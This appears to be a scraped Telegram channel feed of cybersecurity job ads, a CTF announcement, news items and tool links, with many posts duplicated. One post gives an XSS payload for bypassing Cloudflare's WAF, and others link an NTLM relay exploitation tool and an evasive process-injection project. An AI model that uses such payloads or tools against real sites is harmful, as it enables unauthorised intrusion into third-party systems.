فراخوان شرکت در مسابقه «فتح پرچم» گروه اسنپ؛ ۲۰۰میلیون تومان جایزه برای فاتحان پرچم امنیت سایبری
https://ctf.snapp.ir
@Engineer_Computer
https://ctf.snapp.ir
@Engineer_Computer
👎1
Are you ready to safeguard the digital world? Join our team as a Web Application Penetration Tester!
Arman Data Pouyan is seeking a skilled and motivated web penetration tester to join our dynamic team. As part of our growth initiative, we are looking to expand our penetration testing team with individuals who possess a unique blend of technical and personal skills.
Technical Skills:
• Proficiency in web application security testing
• In-depth knowledge of common web application vulnerabilities (e.g., OWASP Top 10)
• Familiarity with related standards like WSTG, PCI DSS, etc
• Experience with tools such as Burp Suite, OWASP ZAP, and Metasploit
• Ability to perform security assessments and penetration testing on web applications manually and automatically
• Familiarity with network and operating system principles
• Excellent report writing and documentation skills
Personal Skills:
• Strong problem-solving and analytical abilities
• Ability to work effectively in a team and independently
• Attention to detail and a commitment to quality
• Continuous learning and adaptability to new technologies
Benefits:
• Market-leading salary
• Fully covered private health insurance
• Shahrvand stores shopping card (Reloaded quarterly)
• Career growth opportunities
• Opportunity to work on enterprise projects
• Ongoing training programs
Full-time, On-site, Tehran
If you are passionate about cybersecurity and possess the above-mentioned skills, we encourage you to apply. Join us in our mission to strengthen the security posture of our clients and make a meaningful impact in the industry.
ADP and You... Better together!
Contact:
@amir_h_fallahi
jobs@armandata.com
@Engineer_Computer
Arman Data Pouyan is seeking a skilled and motivated web penetration tester to join our dynamic team. As part of our growth initiative, we are looking to expand our penetration testing team with individuals who possess a unique blend of technical and personal skills.
Technical Skills:
• Proficiency in web application security testing
• In-depth knowledge of common web application vulnerabilities (e.g., OWASP Top 10)
• Familiarity with related standards like WSTG, PCI DSS, etc
• Experience with tools such as Burp Suite, OWASP ZAP, and Metasploit
• Ability to perform security assessments and penetration testing on web applications manually and automatically
• Familiarity with network and operating system principles
• Excellent report writing and documentation skills
Personal Skills:
• Strong problem-solving and analytical abilities
• Ability to work effectively in a team and independently
• Attention to detail and a commitment to quality
• Continuous learning and adaptability to new technologies
Benefits:
• Market-leading salary
• Fully covered private health insurance
• Shahrvand stores shopping card (Reloaded quarterly)
• Career growth opportunities
• Opportunity to work on enterprise projects
• Ongoing training programs
Full-time, On-site, Tehran
If you are passionate about cybersecurity and possess the above-mentioned skills, we encourage you to apply. Join us in our mission to strengthen the security posture of our clients and make a meaningful impact in the industry.
ADP and You... Better together!
Contact:
@amir_h_fallahi
jobs@armandata.com
@Engineer_Computer
Enterprise Account Executive - IT Solutions/Reseller
CA-Irvine, Enterprise Account Executive - Cybersecurity - Hybrid or Remote Position - IT Services This Jobot Job is hosted by: Jeffrey Skarvan Are you a fit? Easy Apply now by clicking the "Quick Apply" button and sending us your resume. Salary: $150,000 - $300,000 per year A bit about us: We're based out of California with offices across the US and we deliver a comprehensive suite of services encompassing n
http://jobview.monster.com/Enterprise-Account-Executive-IT-Solutions-Reseller-Job-Irvine-CA-US-269099969.aspx
#US #Enterprise Account Executive - IT Solutions/Reseller
@Engineer_Computer
CA-Irvine, Enterprise Account Executive - Cybersecurity - Hybrid or Remote Position - IT Services This Jobot Job is hosted by: Jeffrey Skarvan Are you a fit? Easy Apply now by clicking the "Quick Apply" button and sending us your resume. Salary: $150,000 - $300,000 per year A bit about us: We're based out of California with offices across the US and we deliver a comprehensive suite of services encompassing n
http://jobview.monster.com/Enterprise-Account-Executive-IT-Solutions-Reseller-Job-Irvine-CA-US-269099969.aspx
#US #Enterprise Account Executive - IT Solutions/Reseller
@Engineer_Computer
Enterprise Account Executive - IT Solutions/Reseller
CA-San Bernardino, Enterprise Account Executive - Cybersecurity - Hybrid or Remote Position - IT Services This Jobot Job is hosted by: Jeffrey Skarvan Are you a fit? Easy Apply now by clicking the "Quick Apply" button and sending us your resume. Salary: $150,000 - $300,000 per year A bit about us: We're based out of California with offices across the US and we deliver a comprehensive suite of services encompassing n
http://jobview.monster.com/Enterprise-Account-Executive-IT-Solutions-Reseller-Job-San-Bernardino-CA-US-269099968.aspx
#US #Enterprise Account Executive - IT Solutions/Reseller
@Engineer_Computer
CA-San Bernardino, Enterprise Account Executive - Cybersecurity - Hybrid or Remote Position - IT Services This Jobot Job is hosted by: Jeffrey Skarvan Are you a fit? Easy Apply now by clicking the "Quick Apply" button and sending us your resume. Salary: $150,000 - $300,000 per year A bit about us: We're based out of California with offices across the US and we deliver a comprehensive suite of services encompassing n
http://jobview.monster.com/Enterprise-Account-Executive-IT-Solutions-Reseller-Job-San-Bernardino-CA-US-269099968.aspx
#US #Enterprise Account Executive - IT Solutions/Reseller
@Engineer_Computer
Enterprise Account Executive - IT Solutions/Reseller
CA-Pasadena, Enterprise Account Executive - Cybersecurity - Hybrid or Remote Position - IT Services This Jobot Job is hosted by: Jeffrey Skarvan Are you a fit? Easy Apply now by clicking the "Quick Apply" button and sending us your resume. Salary: $150,000 - $300,000 per year A bit about us: We're based out of California with offices across the US and we deliver a comprehensive suite of services encompassing n
http://jobview.monster.com/Enterprise-Account-Executive-IT-Solutions-Reseller-Job-Pasadena-CA-US-269099966.aspx
#US #Enterprise Account Executive - IT Solutions/Reseller
@Engineer_Computer
CA-Pasadena, Enterprise Account Executive - Cybersecurity - Hybrid or Remote Position - IT Services This Jobot Job is hosted by: Jeffrey Skarvan Are you a fit? Easy Apply now by clicking the "Quick Apply" button and sending us your resume. Salary: $150,000 - $300,000 per year A bit about us: We're based out of California with offices across the US and we deliver a comprehensive suite of services encompassing n
http://jobview.monster.com/Enterprise-Account-Executive-IT-Solutions-Reseller-Job-Pasadena-CA-US-269099966.aspx
#US #Enterprise Account Executive - IT Solutions/Reseller
@Engineer_Computer
SENIOR PROJECT MANAGER
VA-Falls Church, Senior Project Manager Job Denoscription The Senior Project Manager positions will perform day-to-day management of the project, identify issues and risks, and recommend and implement approved mitigation strategies associated with the project. Role and Responsibilities Provide weekly scope, budget, and schedule status updates on the accomplishments, milestones, tasks, roadblocks, issues, and risks r
http://jobview.monster.com/SENIOR-PROJECT-MANAGER-Job-Falls-Church-VA-US-269120860.aspx
#US #SENIOR PROJECT MANAGER
@Engineer_Computer
VA-Falls Church, Senior Project Manager Job Denoscription The Senior Project Manager positions will perform day-to-day management of the project, identify issues and risks, and recommend and implement approved mitigation strategies associated with the project. Role and Responsibilities Provide weekly scope, budget, and schedule status updates on the accomplishments, milestones, tasks, roadblocks, issues, and risks r
http://jobview.monster.com/SENIOR-PROJECT-MANAGER-Job-Falls-Church-VA-US-269120860.aspx
#US #SENIOR PROJECT MANAGER
@Engineer_Computer
Network Engineer
NY-Rochester, As part of a global manufacturing leader in Aerospace and DoD components has been rapidly expanding for the 10th year in row. They are expanding their InfoSec team and looking for your expertise. This Jobot Job is hosted by: Tyler Keear Are you a fit? Easy Apply now by clicking the "Quick Apply" button and sending us your resume. Salary: $90,000 - $120,000 per year A bit about us: As part of a glo
http://jobview.monster.com/Network-Engineer-Job-Rochester-NY-US-269122281.aspx
#US #Network Engineer
@Engineer_Computer
NY-Rochester, As part of a global manufacturing leader in Aerospace and DoD components has been rapidly expanding for the 10th year in row. They are expanding their InfoSec team and looking for your expertise. This Jobot Job is hosted by: Tyler Keear Are you a fit? Easy Apply now by clicking the "Quick Apply" button and sending us your resume. Salary: $90,000 - $120,000 per year A bit about us: As part of a glo
http://jobview.monster.com/Network-Engineer-Job-Rochester-NY-US-269122281.aspx
#US #Network Engineer
@Engineer_Computer
🗒 bypass XSS Cloudflare WAF
Encoded Payload
"><track/onerror='confirm\%601\%60'>
Clean Payload
"><track/onerror='confirm1'>
@Engineer_Computer
Encoded Payload
"><track/onerror='confirm\%601\%60'>
Clean Payload
"><track/onerror='confirm1'>
@Engineer_Computer
⚡️Google Agrees to Pay $350 Million to Settle Class Action Lawsuit Over Google+ User Data Leak
According to a document filed in the U.S. Court for the Northern District of California, people who purchased Google stock between April 23, 2018, and April 30, 2019, will be able to apply for a share of the settlement.
There will be a notification for eligible investors and Google has a portal with relevant information.
@Engineer_Computer
According to a document filed in the U.S. Court for the Northern District of California, people who purchased Google stock between April 23, 2018, and April 30, 2019, will be able to apply for a share of the settlement.
There will be a notification for eligible investors and Google has a portal with relevant information.
@Engineer_Computer
Gizchina
Google agrees to pay $350 million to settle class action lawsuit over Google+ user data leak
Alphabet's Google agreed to pay $350 million as a settlement for the Google+ data breach. Understand the background and broader implications
وقتی NSA از هوش مصنوعی برای کشف حملات استفاده میکنه
#NSA
https://industrialcyber.co/critical-infrastructure/senior-us-cybersecurity-official-reveals-use-of-ai-to-counter-hackers-targeting-critical-infrastructure/
@Engineer_Computer
#NSA
https://industrialcyber.co/critical-infrastructure/senior-us-cybersecurity-official-reveals-use-of-ai-to-counter-hackers-targeting-critical-infrastructure/
@Engineer_Computer
Industrial Cyber
Senior US cybersecurity official reveals use of AI to counter hackers targeting critical infrastructure
US cybersecurity official reveals the use of AI to counter hackers targeting critical infrastructure, as cyber expertise is in short supply.
NTLM Relay Gat - streamlines the process of exploiting NTLM relay vulnerabilities, offering a range of functionalities from listing SMB shares to executing commands on MSSQL databases.
https://github.com/ad0nis/ntlm_relay_gat
@Engineer_Computer
https://github.com/ad0nis/ntlm_relay_gat
@Engineer_Computer
GitHub
GitHub - ad0nis/ntlm_relay_gat
Contribute to ad0nis/ntlm_relay_gat development by creating an account on GitHub.
This repository contains multiple PowerShell noscripts that can help you respond to cyber attacks on Windows Devices.
https://github.com/Bert-JanP/Incident-Response-Powershell
@Engineer_Computer
https://github.com/Bert-JanP/Incident-Response-Powershell
@Engineer_Computer
GitHub
GitHub - Bert-JanP/Incident-Response-Powershell: PowerShell Digital Forensics & Incident Response Scripts.
PowerShell Digital Forensics & Incident Response Scripts. - Bert-JanP/Incident-Response-Powershell
Indirect Dynamic Syscall, SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing + Api resolving from TIB + API hashing
https://github.com/reveng007/DarkWidow
@Engineer_Computer
https://github.com/reveng007/DarkWidow
@Engineer_Computer
GitHub
GitHub - reveng007/DarkWidow: Indirect Dynamic Syscall, SSN + Syscall address sorting via Modified TartarusGate approach + Remote…
Indirect Dynamic Syscall, SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+Bloc...
🔖The jsluice++ extension was published yesterday, which is a Burp Suite extension designed to passively and actively scan javanoscript traffic using the jsluice CLI.
The extension utilizes jsluice's ability to extract URLs, paths and secrets from static JavaScript files and integrates it with Burp Suite, allowing you to easily scan javanoscript traffic from Burp Suite's Sitemap or Proxy, while offering a user-friendly interface for data validation and many additional useful features.
github: https://github.com/0x999-x/jsluicepp
#BugBounty #BugBountyTools
@Engineer_Computer
The extension utilizes jsluice's ability to extract URLs, paths and secrets from static JavaScript files and integrates it with Burp Suite, allowing you to easily scan javanoscript traffic from Burp Suite's Sitemap or Proxy, while offering a user-friendly interface for data validation and many additional useful features.
github: https://github.com/0x999-x/jsluicepp
#BugBounty #BugBountyTools
@Engineer_Computer